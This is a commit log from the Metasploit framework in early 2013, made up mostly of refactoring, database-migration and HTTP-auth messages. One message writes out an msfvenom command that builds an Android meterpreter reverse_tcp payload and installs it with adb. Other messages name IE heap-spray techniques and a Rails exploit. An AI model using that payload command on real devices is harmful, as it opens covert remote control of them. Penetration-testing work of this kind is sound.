James Lee f3ff5b5205 Factorize and remove includes
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
James Lee 0466cce7b1 Move PostMixin to its own file
Also replaces dead code in lib/msf/core/exploit/local.rb with what was
actually being used for the Exploit::Local class that lived in
lib/msf/core/exploit.rb.
2013-05-28 15:46:06 -05:00
Samuel Huckins e20385dd9e Merge pull request #1864 from dmaloney-r7/feature/task_associations/cred_service_host
Passes specs and functional tests
2013-05-28 12:11:57 -07:00
James Lee 9843dc4cb4 Land #1708, android meterpreter
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
David Maloney 849d974463 Add session_port to the mdm object
Mdm::Session was not being passed the session_port
FIXRM #7281
2013-05-24 17:46:03 -05:00
Luke Imhoff c22178752e Merge branch 'master' into bug/module-load-cache-update 2013-05-24 11:06:16 -05:00
sinn3r e169ccab4f Landing #1862 - Remove inline unit tests 2013-05-23 22:19:29 -05:00
Luke Imhoff 1a487e476d Merge branch 'master' into bug/module-load-cache-update 2013-05-23 14:23:14 -05:00
David Maloney 0f21861921 Add task handling to imports
allow imports to carry along task info

[Story #49167601]
2013-05-23 13:33:19 -05:00
Tod Beardsley 05916c079e Inline unit tests are so last decade
Aside from codebase-wide changes, nearly all of these tests haven't been
touched since before 2010, and there is no effort to maintain this style
of testing. We've moved on to (correctly) seperating out our tests from
our codebase.
2013-05-23 12:41:14 -05:00
Tod Beardsley a852304ba3 DRY: Move check things to the common module level
While it makes lots of sense to bring check to all modules, of course
some modules will not be able to actually use it. Namely modules like
nop and payload modules. If you're feeling creative, you could probably
come up with semantically similar checks for those, too.
2013-05-23 11:42:41 -05:00
Tod Beardsley 7436fdad72 First, copy-pasta and add a test 2013-05-23 11:26:53 -05:00
David Maloney d8074c0bf4 Use create not new
Was calling .new instead of .create
[Story #49167601]
2013-05-22 18:29:22 -05:00
Luke Imhoff 2b70ec2e08 Payload compatible cache_in_memory
[#47720609]

Msf::PayloadSet#add_module does NOT return an annotated module class as
Msf::ModuleSet#add_module does because a payload module is defined as a
ruby Module instead of a ruby Class.   Since add_module doesn't always
return an annotated_class, the logic in
Msf::ModuleManager#on_module_load needed to change to NOT use
annotated_class and create #add_module as return [void].  Thus, it is
necessary to pass in all the metasploit module metadata to
Msf::ModuleManager#cache_in_memory instead of assuming they can be
derived from the (payload) Module or (other) Class.
2013-05-22 16:06:02 -05:00
David Maloney 69dd7f5c58 Update Mdm and Add Task stuff to report
make report_* methods aware of Tasks

[Story #49167601]
2013-05-22 14:59:43 -05:00
Luke Imhoff 57576de85f Update in-memory cache to fix file_changed?
[#47720609]

Msf::ModuleManager#module_info_by_path was not being updated when a
module was loaded, so if a load_module was called again, say during
start up of prosvc, the module would reload even though there was no
change in the file because file_changed? couldn't find an entry for the
module's path in module_info_by_path.
2013-05-22 12:28:42 -05:00
sinn3r e2aad8930d Landing #1853 - Remove ID tags 2013-05-22 12:12:55 -05:00
sinn3r 8483528ae0 Restore generic.rb to the correct state 2013-05-22 12:11:06 -05:00
sinn3r 1cf485fad1 Restore tcp.rb to its current state 2013-05-22 12:06:36 -05:00
Luke Imhoff eede80509f Reuse appropriate terminology in docs
[#47720609]

Fix some docs and variable names to make it clearer when methods are
expecting module instance and module classes.  Change some 'name'
variables to 'reference_name' since that's the proper terminology.
2013-05-21 08:19:47 -05:00
James Lee f4498c3916 Remove $Id tags
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
Luke Imhoff 89bd5b4791 Reset column information after running migrations
[#50179803]
[SeeRM #7967]
[SeeRM #7870]

Because metasploit-framework runs migrations with the same process and
with the same connection as it later accesses the database, the column
information can become cached prematurely and be incorrect by the end of
the migrations.  Fix the bad cache by automatically resetting the column
information for all model classes after the migrations have run.
2013-05-20 13:08:07 -05:00
Luke Imhoff 398dcfa8cb Merge branch 'master' into bug/migrations 2013-05-20 12:49:33 -05:00
Luke Imhoff 0e435d378c Move Msf::DBManager#migrate(d) to module
[#50179803]

Move Msf::DBManager#migrate and the migrated attribute to
Msf::DBManager::Migration module to lower complexity of db_manager.rb
and in preparation for more migration related code on this branch.
2013-05-20 12:45:17 -05:00
Luke Imhoff 82867fbb66 Prevent duplicate migrations_paths
[#50099107]

If Msf::DBManager#initialize_metasploit_data_models is run multiple
times, such as during specs, ActiveRecord::Migrator.migrations_paths was
getting populated with multiple copies of the metasploit_data_models
db/migrate path, which would lead to 'DB.migrate threw an exception:
Multiple migrations have the version number 0' errors in framework.log.
2013-05-17 14:56:17 -05:00
James Lee 61afe1449e Landing #1275, bash cmdstager
Conflicts:
	lib/rex/exploitation/cmdstager.rb

Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
Tasos Laskos 0a55c7e4b6 Proofs can be omitted if they contain sensitive data 2013-05-14 20:46:17 +03:00
Tasos Laskos a12e59ef1f Merge branch 'master' into bug/web-match_and_log_fingerprint 2013-05-14 01:55:37 +03:00
Tasos Laskos f4bc3096b2 #match_and_log_fingerprint: store match not fingerprint 2013-05-10 19:59:12 +03:00
Luke Imhoff afa04ac9d0 Merge branch 'master' into feature/mdm-module-namespace 2013-05-09 16:13:06 -05:00
Luke Imhoff bc92b43408 Update to metasploit_data_models 0.11.0
[#47979793]
2013-05-09 13:25:26 -05:00
Luke Imhoff a5648a8830 Merge branch 'master' into feature/mdm-module-namespace
Conflicts:
	Gemfile
	Gemfile.lock
	lib/msf/core/db_manager.rb
2013-05-08 13:22:41 -05:00
James Lee 9ab68ac935 Fix unintelligible error when importing empty file
IO#read returns nil for an empty file if given a length argument, which
caused a stack trace when attempting to import a file instead of a
useful error message.
2013-05-07 18:05:45 -05:00
James Lee 9e7885857c Land #1776, assembly payload blob cache fix 2013-05-02 16:58:14 -05:00
James Lee 0d9b120bac Get rid of the suffix
This makes blob cache a little cleaner

[FixRM #7898]
2013-05-02 16:55:14 -05:00
jvazquez-r7 5cfc306466 Land @1785, @wchen-r7's API addition for the mstime ie8 technique 2013-05-02 00:00:49 -05:00
sinn3r 69f8103ffe Make animatecolor element optional by using innerHTML 2013-05-01 14:21:52 -05:00
sinn3r 3d2cb9ec3f Uses rand_text_hex for RGB values, and correcting exception handling 2013-05-01 13:41:36 -05:00
sinn3r 71afd762a9 According to MSFG, I can use RGB, so here goes 2013-04-30 18:48:21 -05:00
sinn3r ae94fbdf6c Updates documentation 2013-04-30 17:11:19 -05:00
sinn3r 9cc624456a Adds function js_mstime_malloc
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values
function that's suitable for a no-spray technique (based on wtfuzz's
PoC for MS13-008)
2013-04-30 16:40:10 -05:00
kernelsmith cf7702f7e9 "acitve" should be "aggressive"
fixes http://dev.metasploit.com/redmine/issues/7926 which prevented a
proper search using:
msf> search exploit:type app:server
2013-04-30 13:04:19 -05:00
James Lee 906863676e Fix a logic error in HttpServer
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.

This commit fixes the problem in two ways:

1. It changes the default cli in get_uri to be the module's self.cli,
   which should always be set when passive modules would need it (e.g., in
   the on_request_uri method).

2. It adds a check to make sure that the calling module has a sock
   before trying to get its peerhost. This was @marthieubean's suggested
   solution in #1775.

[Closes #1775]
2013-04-29 13:44:58 -05:00
Raphael Mudge 21f8e19d55 Single Payloads Cache Assembled Payload Improperly
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.

internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.

Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.

This fix updates build to use the hashcode of the assembly code as
part of the cache key.

This fixes #7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
2013-04-29 11:54:53 -04:00
Meatballs 8bfaa41723 Fix x64 dll creation 2013-04-27 20:44:46 +01:00
Luke Imhoff 249a09cd52 Update to metasploit_data_models 0.7.1
[#47979793]
2013-04-26 13:14:38 -05:00
sinn3r b1e49e7116 Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master 2013-04-25 20:54:28 -05:00
sinn3r 5b0ae1476b Let's word this a little differently 2013-04-25 20:52:51 -05:00
Meatballs b58a775af5 Added opt delay to file_dropper 2013-04-25 20:52:51 -05:00
sinn3r 008266a581 Corrects documentation. Thanks Meatballs1 2013-04-25 19:13:16 -05:00
sinn3r ff87e3622b Changes made according to feedback from Juan and James 2013-04-25 15:19:44 -05:00
James Lee 6767eee08a Add in-line signing
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.

Example usage:
  ./msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
  adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Luke Imhoff 24b97137ea Msf::DBManager Mdm::Module* specs
[#47979793]
2013-04-25 09:46:53 -05:00
sinn3r 6642545551 Adds new JavaScript function "js_download"
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
2013-04-24 17:36:45 -05:00
Luke Imhoff 492b081280 Msf::DBManager::Export#extract_module_detail_info spec
[#47979793]
2013-04-20 16:44:42 -05:00
Luke Imhoff e5befb7094 Msf::DBManager#report_session specs
[#47979793]
2013-04-19 10:11:33 -05:00
Tod Beardsley 25fcbd4e70 Landing #1733, setting a sensible heapsray offset
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
2013-04-15 16:32:48 -05:00
Tod Beardsley 7f8040c4e4 Lands #1722, Rex::Socket comment docs 2013-04-15 13:44:00 -05:00
Luke Imhoff 2c681005c0 Msf::ModuleManager::Cache spec coverage
[#47979793]
2013-04-15 13:08:12 -05:00
timwr df9c5f4a80 remove unused resources and fix whitespace 2013-04-13 16:22:52 +01:00
scriptjunkie 2c41ca6598 Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework 2013-04-12 21:10:44 -05:00
sinn3r d28db8a2a3 Forgot the comment 2013-04-12 20:21:10 -05:00
sinn3r f2cbbf43e8 Changes default offset
Points to the beginning of the block
2013-04-12 20:19:47 -05:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
RageLtMan 6eb33ae5ed Rex::Socket::SslTcp set cipher and verify_mode
Update Rex::Socket::SslTcp to accept verification mode string from
Rex::Socket::Parameters, which has been modified accordingly.
Add SSLVerifyMode and SSLCipher options (params and socket work
were done before, but the option was not exposed) to
Msf::Exploit::Tcp.

Testing:
```
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'NONE')
>> sock.sslctx.verify_mode
=> 0
>> sock.close
=> nil
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'PEER')
=> #<Socket:fd 13>
>> sock.sslctx.verify_mode
=> 1
```

Note: this should be able to resolve the recent SSL socket hackery
of exploit/linux/misc/nagios_nrpe_arguments.
2013-04-11 18:00:33 -04:00
James Lee 6a0b240d10 Add some better docs for Rex::Socket 2013-04-10 12:41:41 -05:00
Rob Fuller 2949c4a339 enable stage encoding for reverse_http(s) 2013-04-10 12:10:17 -03:00
Tod Beardsley 6a5d318749 Bumping version. 2013-04-10 08:59:56 -05:00
James Lee cd86a69090 Have Post::File use shiny new session.fs.file.mv
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
2013-04-05 01:24:24 -05:00
Luke Imhoff 809969b49f Merge branch 'master' into feature/patchable-web-vuln-import 2013-04-02 22:38:54 -05:00
Luke Imhoff 0bb79ba890 Msf::DBManager#import_msf_xml refactor
[#46491831]

Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns.  The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
2013-04-01 16:06:40 -05:00
Luke Imhoff 2317e9cced Fix yard tag warnings
[#46491831]
2013-03-30 17:13:12 -05:00
Luke Imhoff 7ed2812ec3 Fix Cannot resolve link YARD warnings
[#46491831]
2013-03-30 16:58:49 -05:00
Luke Imhoff c210260845 Fix Undocumentable method, missing name YARD warning
[#46491831]

Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call.  By removing the ##, the
warning disappeared.  I did not determine what is special about ## in
file comments.
2013-03-30 15:32:38 -05:00
sinn3r 463725efec Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke 2013-03-29 09:30:21 -05:00
Tasos Laskos 380f5f56ae Auxiliary::Web::HTTP#_request: print_error => elog
[SEERM #7839]

Reverted earlier commit.
2013-03-27 16:36:50 +02:00
David Maloney a87e414274 fix winrm poke method 2013-03-26 13:05:33 -05:00
David Maloney 509ae76dc9 make sure we grab the workspace for store_local
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
2013-03-22 16:52:38 -05:00
sinn3r 0634cb9892 Need to avoid badchar 0x00
0x00 becomes double null, which functions like a terminator
2013-03-22 13:18:32 -05:00
sinn3r 566806487c Randomize the "div_container" var because it's global
It's best to randomize this variable name because it's global.
2013-03-22 13:16:14 -05:00
sinn3r 1ac31a3e12 Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update 2013-03-22 12:54:23 -05:00
sinn3r cce74246d8 Merge branch 'master' of github.com:rapid7/metasploit-framework 2013-03-19 15:03:24 -05:00
Tasos Laskos 11c38d925b Auxiliary::Web::Path: Fuzzable API update
[FIXRM #7817]

Path object was using an outdated fuzzable API which was causing
scan errors.
2013-03-19 18:41:52 +02:00
Tasos Laskos ad39a5cdc3 Auxiliary::Web::HTTP#_request: elog => print_error
[SEERM #7815]

Switched form elog to print_error to make reporting bugs easier on users.
2013-03-19 17:18:44 +02:00
Tod Beardsley afcbaffa2b Revert "add -R capability like hosts -R"
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.

This reverts commit 52596ae3b4.
2013-03-18 15:28:19 -05:00
Tod Beardsley 91e3f4cca6 Merge 'kernelsmith/msfconsole-grep'
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.

[Closes #1320]

Conflicts:
	lib/msf/ui/console/command_dispatcher/core.rb
2013-03-18 14:39:45 -05:00
Luke Imhoff 2075a7b46c Remove active_record patch
[#46141013]

Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
2013-03-18 11:32:21 -05:00
Meatballs f9327d169b msftidy 2013-03-17 14:31:40 -04:00
Meatballs b6da5f84bb Refactor 2013-03-17 14:09:00 -04:00
Tasos Laskos 5967991f6f Auxiliary::Web#log_*: details[:category] => #name
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
2013-03-12 19:43:47 +02:00
Tasos Laskos c641ca96c1 Auxiliary::Web::Path.from_model: inputs => form.inputs
Fixed uninitialized variable error.
2013-03-11 23:08:41 +02:00
Raphael Mudge d764740779 Convert user/pass tokens to ASCII in db.rb
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.

The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
2013-03-11 15:02:28 -04:00
Meatballs 756dec6fcc Msftidy EXE 2013-03-10 20:56:21 +00:00
Meatballs 71a38b81dd Added generation to Exploit::EXE 2013-03-10 20:54:37 +00:00
Tasos Laskos 7e15788bb5 Auxiliary::Web: updated form of vuln storage in parent
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
2013-03-08 22:38:23 +02:00
Spencer McIntyre 8b5a83c7f5 Remove the DECODER option 2013-03-08 15:25:16 -05:00
Tasos Laskos ac6065d8f9 Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-08 21:50:49 +02:00
Tasos Laskos 3422a7c098 Auxiliary::Web: force vuln proof to_s 2013-03-08 21:50:01 +02:00
Spencer McIntyre aceba9fc8a Revert "escape ticks and spaces in paths"
This reverts commit 4c87b1ba36.
2013-03-08 14:37:28 -05:00
James Lee db676f1a88 Whitespace at EOL 2013-03-07 18:20:08 -06:00
Tasos Laskos cf3df4b179 Auxiliary::Web::HTTP: added error output
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
2013-03-07 20:14:38 +02:00
Tasos Laskos d9a6f5f0ca Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-06 18:26:18 +02:00
Tasos Laskos c497d5ffef Auxiliary::Web: log methods pass vuln info to parent 2013-03-06 18:25:25 +02:00
Samuel Huckins 09fc52f3d9 Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths
Use ActiveRecord::Migrator  multiple migrations paths support
2013-03-06 08:20:36 -08:00
James Lee 24c0da0adb Merge branch 'rapid7' into doc/cleanup-peparsey 2013-03-05 21:00:26 -06:00
James Lee 27727df415 Merge branch 'R3dy-psexec-mixin2' into rapid7 2013-03-05 14:36:55 -06:00
James Lee a928e5f963 Whitespace 2013-03-05 14:34:56 -06:00
David Maloney f5c23e4b02 fix typo snaffu 2013-03-05 12:35:21 -06:00
David Maloney 1407886e83 Revert "fix a major typo snaffu"
This reverts commit c639de7ccc.
2013-03-05 12:34:51 -06:00
David Maloney c639de7ccc fix a major typo snaffu 2013-03-05 12:33:37 -06:00
James Lee ac63965e4d Merge remote-tracking branch 'gerry/nbe_importing_fix' into rapid7 2013-03-04 20:00:50 -06:00
James Lee c0689a7d43 Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-03-04 12:14:33 -06:00
David Maloney 6dcca7df78 Remove duplicated header issues
Headers were getting duped back into client config, causing invalid
requests to be sent out
2013-03-04 11:24:26 -06:00
Luke Imhoff 0ddc6b3afa Document Msf::DBManager#initialize_metasploit_data_models 2013-03-02 21:16:02 -06:00
Luke Imhoff c9a162ac33 Correct return type of Msf::DBManager#migrate. 2013-03-02 21:09:45 -06:00
Luke Imhoff af4b3fa287 Use ActiveRecord::Migrator multiple migrations paths support
[#44034071]

ActiveRecord::Migrator has a class attribute, migrations_paths,
specificially for storing a list of different directories that have
migrations in them.  ActiveRecord::Migrator.migrations_paths is used in
rake db:load_config, which is a dependency of db:migrate, etc. that is
passed to ActiveRecord::Migrator.migrate.  Since migrate supports an
array of directories, and not just a single directory, there is no need
to merge all the migrations paths into one temporary directory as was
previously done.
2013-03-02 20:33:48 -06:00
Samuel Huckins 2e4760c486 Merge pull request #1533 from rapid7/feature/migrations-in-metasploit_data_models
All steps passing as described.
2013-03-01 12:54:41 -08:00
Tasos Laskos 99a8ec593b Fixing merge conflicts 2013-03-01 20:21:02 +02:00
David Maloney 4212c36566 Fix up basic auth madness 2013-03-01 11:59:02 -06:00
Samuel Huckins 7b8654a71d Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence"
This reverts commit 3840ddccbc, reversing
changes made to e1891f0836.
2013-03-01 11:41:06 -06:00
Samuel Huckins 3840ddccbc Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence
Auxiliary::Web: fixed confidence calculation in log methods
2013-03-01 09:25:07 -08:00
Tasos Laskos 862b813786 Auxiliary::Web: fixed confidence calc in log methods 2013-03-01 18:33:16 +02:00
Luke Imhoff 239e1934b8 Use migrations from metasploit_data_models
[#44034071]

metasploit_data_models version 0.5.0 copied the migrations from
metasploit-framework/data/sql/migrate to
metasploit_data_models/db/migrate so that specs could be written the Mdm
models in metasploit_data_models.  As part of the specs, :null => false
columns that should be :null => true were discovered, so a new migration
was added, but to metasploit_data_models/db/migrate, so it could be
tested.  Instead of replicating migrations back and forth, I'm removing
the migrations completely from metasploit-framework and changing the
default migration path in Msf::DbManager#migration_paths to
MetasploitDataModels.root.join('db', 'migrate').
2013-03-01 09:03:45 -06:00
David Maloney c290bc565e Merge branch 'master' into feature/http/authv2 2013-02-28 14:33:44 -06:00
sinn3r 18c0bb0ac8 Updates description again 2013-02-28 11:34:48 -06:00
sinn3r 8cb5da0794 One size rules them all. 2013-02-28 11:21:23 -06:00
sinn3r 722e077029 Update generic target 2013-02-28 11:09:52 -06:00
sinn3r 2c013cada8 Update documentation for default values 2013-02-28 11:05:18 -06:00
sinn3r 86d78939ad Make objId optional 2013-02-28 11:01:15 -06:00
sinn3r 9f35452d73 Beef up the default values for precise alloc size and consistency 2013-02-28 10:35:40 -06:00
sinn3r bb02dc43b3 Documentation 2013-02-27 15:34:21 -06:00
sinn3r 312638d6a5 Correct allocation size for IE10 2013-02-27 14:32:39 -06:00
sinn3r e3f0757304 Improved version thanks to corelanc0d3r 2013-02-27 14:08:57 -06:00
sinn3r 2a7b4ee3d8 Merge branch 'master' into setstringproperty_spray 2013-02-27 11:15:52 -06:00
Gerry Eisenhaur 724b32af17 Fixed the importing of NBE files 2013-02-26 16:55:26 -08:00
sinn3r 38af8ba866 Merge branch 'feature/sqli-exploitation-mssql' of github.com:tasos-r7/metasploit-framework into tasos-r7-feature/sqli-exploitation-mssql 2013-02-26 13:41:32 -06:00
Tasos Laskos 0421cff913 Exploit::Remote::Web#perform_request: timeout set to 10 2013-02-25 19:49:39 +02:00
HD Moore 9d9d83cf8b Implement per-target arch/platform searches SeeRM #7754 2013-02-24 11:06:29 -06:00
sinn3r aa007b9e0a Updates 2013-02-22 20:07:16 -06:00
Meatballs 07475e5483 Update 2013-02-22 21:22:51 +00:00
sinn3r 56fa5ead37 Initial version of js_property_spray 2013-02-22 10:21:20 -06:00
James Lee c423ad2583 Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-02-21 15:30:43 -06:00
David Maloney ac6fdf24a2 Fix winrm mixin from revert merge 2013-02-19 22:01:43 -06:00
David Maloney b2563dd6c2 trying to clean up the mess from the revert 2013-02-19 21:25:37 -06:00
Tod Beardsley 3949c851a4 Was, indeed, missing an or pipe 2013-02-19 17:53:48 -06:00
Tod Beardsley d81f177ab6 Adding Nemski's fix
[FixRM #7451]
2013-02-19 17:51:51 -06:00
James Lee 4703278183 Move SMB mixins into their own directory 2013-02-19 12:55:06 -06:00
James Lee ede804e6af Make psexec mixin a bit better
* Removes copy-pasted code from psexec_command module and uses the mixin
  instead

* Uses the SMB protocol to delete files rather than psexec'ing to call
  cmd.exe and del

* Replaces several instances of "rescue StandardError" with better
  exception handling so we don't accidentally swallow things like
  NoMethodError

* Moves file reading and existence checking into the Exploit::SMB mixin
2013-02-19 12:33:19 -06:00
James Lee b72d2b59f8 Add logging in case of exceptions during rm 2013-02-18 18:02:51 -06:00
James Lee 0938190063 Merge branch 'rapid7' into R3dy-psexec-mixin2 2013-02-17 06:08:09 -06:00
James Lee aea76a56de Add some docs to FtpServer 2013-02-13 14:39:19 -06:00
Tod Beardsley 8ddc19e842 Unmerge #1476 and #1444
In that order. #1476 was an attempt to salvage the functionality, but
sinn3r found some more bugs. So, undoing that, and undoing #1444 as
well.

First, do no harm. It's obvious we cannot be making sweeping changes in
libraries like this without a minimum of testing available. #1478 starts
to address that, by the way.

FixRM #7752
2013-02-11 20:49:55 -06:00
nemski b8b445c834 Update lib/msf/core/auxiliary/login.rb
Fix for Bug #7451
2013-02-09 15:32:47 +11:00
James Lee 99218d142b Merge branch 'rapid7' into R3dy-psexec-mixin2 2013-02-08 12:48:06 -06:00
James Lee 5b3b0a8b6d Merge branch 'dmaloney-r7-http/auth_methods' into rapid7 2013-02-08 12:45:35 -06:00
James Lee 2b3c8a68ad Merge remote-tracking branch 'tasos-r7/feature/web_http_request_opts_override' into rapid7 2013-02-08 12:45:02 -06:00
James Lee d2c7dbe160 Merge remote-tracking branch 'wchen-r7/type_error_dir_scanner' into rapid7 2013-02-08 12:39:08 -06:00
sinn3r 8798567d79 Fix bug: TypeError can't convert Fixnum into String
wmap_target_port is retrieved from datastore['RPORT'], and that's a
Fixnum. But wmap_base_url is treating that like a String, so when a
module uses that function, it's doomed.

See:
http://dev.metasploit.com/redmine/issues/7748
2013-02-08 12:05:27 -06:00
James Lee 071df7241b Merge branch 'rapid7' into sonicwall_gms
Conflicts:
	modules/exploits/multi/http/sonicwall_gms_upload.rb

Adds a loop around triggering the WAR payload, which was causing some
unreliability with the Java target.
2013-02-07 21:53:49 -06:00
James Lee e535a3e93f Guard against running broken method on non-windows
This just puts a bandaid around the issue and makes it so FileDropper
doesn't completely break java and posix meterpreter sessions.

[SeeRM #7721]
2013-02-07 21:10:27 -06:00
James Lee 16a0ab1933 Fix comment link and some whitespace 2013-02-07 18:37:11 -06:00
James Lee 13d1045989 Works for java and native linux targets 2013-02-07 16:56:38 -06:00
Tasos Laskos b3e828359d Web::HTTP#_request: allow Rex opt level overrides
Allow overriding options at the Rex level when performing requests
via the Auxiliary::Web::HTTP wrapper.
2013-02-06 01:02:46 +02:00
David Maloney 877fb017b6 remove negotiate requirements
winrm can support basic, and now these modules can too, for free
2013-02-04 16:50:43 -06:00
David Maloney 44d4e298dc Attempting to cleanup winrm auth 2013-02-04 15:48:31 -06:00
David Maloney c71b803413 Add invisible auth to web crawler
the anemone web crawler now properly supports our invisible auth scheme
for rex http.
2013-02-04 14:38:08 -06:00
David Maloney 413c37e506 Add invisible auth to Web::HTTP
add the invisible auth support to tasos' http class
2013-02-04 13:39:40 -06:00
David Maloney 0c57026065 Remove junk added earlier
i added junk to tasos' class when we were going to attempt this a
different way. housekeeping to clean it up
2013-02-04 13:13:08 -06:00
David Maloney 8d013d1034 Merge branch 'master' into http/auth_methods 2013-02-04 13:11:57 -06:00
David Maloney 9497e38ef7 Fix http login scanner
Fix the http_login scanner to use new buitin auth
2013-02-04 12:31:19 -06:00
Royce Davis 7faaa635d3 Fixed exception handling to use smb::proto 2013-02-03 18:46:41 -06:00
HD Moore 797e2604a0 Fix missing require in reverse_tcp_ssl 2013-02-03 17:41:45 -06:00
RageLtMan ffb88baf4a initial module import from SV rev_ssl branch 2013-02-03 15:06:24 -05:00
HD Moore c3801ad083 This adds an openssl CMD payload and handler 2013-02-03 04:44:25 -06:00
David Maloney 61969d575b remove mixin require, more datastore clenaup 2013-02-01 15:12:11 -06:00
David Maloney efe0947286 Start fixing datastore options 2013-02-01 15:12:11 -06:00
David Maloney ef1fc58e5e Remove mixin, start moving into Rex
move auth awareness into rex itself
2013-02-01 15:12:11 -06:00
David Maloney c407fa9e74 add mixjn 2013-02-01 15:12:11 -06:00
David Maloney 5814c59620 move httpauth to mixin
HttpAuth stuff gets it's own little mixin
mix it in to Exploit::Http::Client
mix in it to Auxiliary::Web::HTTP
2013-02-01 15:12:10 -06:00
David Maloney 8e870f3654 merge in sinn3r's changes 2013-02-01 15:12:10 -06:00
jvazquez-r7 174ab31010 Moving reused methods to Accounts mixin 2013-01-31 12:59:55 +01:00
sinn3r 95cc84f5e8 Updates normalize_uri()
This function should not remove the trailing slash, because you may
end up getting a different HTTP response.  The new function also
allows multiple URIs as argument, and will just merge & normalize
them together. [SeeRM #7733]
2013-01-30 15:42:21 -06:00
Tod Beardsley 6002e35460 Merge pull request #1397 from wchen-r7/target_uri_fix
normalize_uri fixes (double slashes and trailing slash)
2013-01-29 11:26:30 -08:00
Tod Beardsley c42d4a6617 Merge for CVE-2013-0156 RoR Exploit
Also massages the RUBY payload.
2013-01-28 23:06:05 -06:00
James Lee 92c736a6a9 Move fork stuff out of exploit into payload mixin
Tested xml against 3.2.10 and json against 3.0.19
2013-01-28 21:34:39 -06:00
sinn3r 9a58b7b732 Fix normalize_uri() function
This will make sure all the double slashes are gone.  Also, the
function description is updated to clarify its purpose.
2013-01-28 12:10:21 -06:00
James Lee 3fc9b5d636 Doc cleanup 2013-01-28 00:01:45 -06:00
Tod Beardsley 2965fa480e Some errant spaces 2013-01-25 05:41:28 -06:00
Tasos Laskos a081389f86 Auxiliary::Web, Exploit::Remote::Web: style updates 2013-01-29 03:08:53 +02:00
Tasos Laskos 76e0305dcf Merge remote-tracking branch 'upstream/master' into web-modules 2013-01-29 01:06:26 +02:00
scriptjunkie d9e1653443 Use EXITFUNC if present to save space and be more correct.
Jump straight to payload on process failure to save space.
2013-01-24 17:14:25 -06:00
Tasos Laskos 9aaca2eae9 Auxiliary::Web::HTTP: updated exception handling
[FIXRM #7724]

Updated #run and #_requestto rescue and elog all exception.
2013-01-24 22:07:17 +02:00
Tasos Laskos 477ab65d55 Exploit::Remote::Web: added #tries method
#tries method indicates how many times we should run a module until
we establish a session.
2013-01-23 23:05:22 +02:00
James Lee ff7756cd54 Make #prepends() actually work 2013-01-22 16:10:44 -06:00
Tasos Laskos 33e9f182bd Merge remote-tracking branch 'upstream/master' into web-modules 2013-01-22 23:43:25 +02:00
Tasos Laskos 6b5c6c3a0c Auxiliary::Web::Analysis::Differential
Removed payload option from #process_vulnerability call
2013-01-22 23:41:36 +02:00
Tasos Laskos 0d564c1ce8 Auxiliary::Web::Analysis::Timing
Updated to pick the largest matching payload from the payload list.
2013-01-22 23:40:30 +02:00
Tasos Laskos f2beb5bf19 Auxiliary::Web#process_vulnerability: payload fix
Updated to pick the largest matching payload from the payload list.
2013-01-22 23:39:16 +02:00
James Lee c37510f777 Move prependmigrate.rb for naming consistency 2013-01-22 14:15:52 -06:00
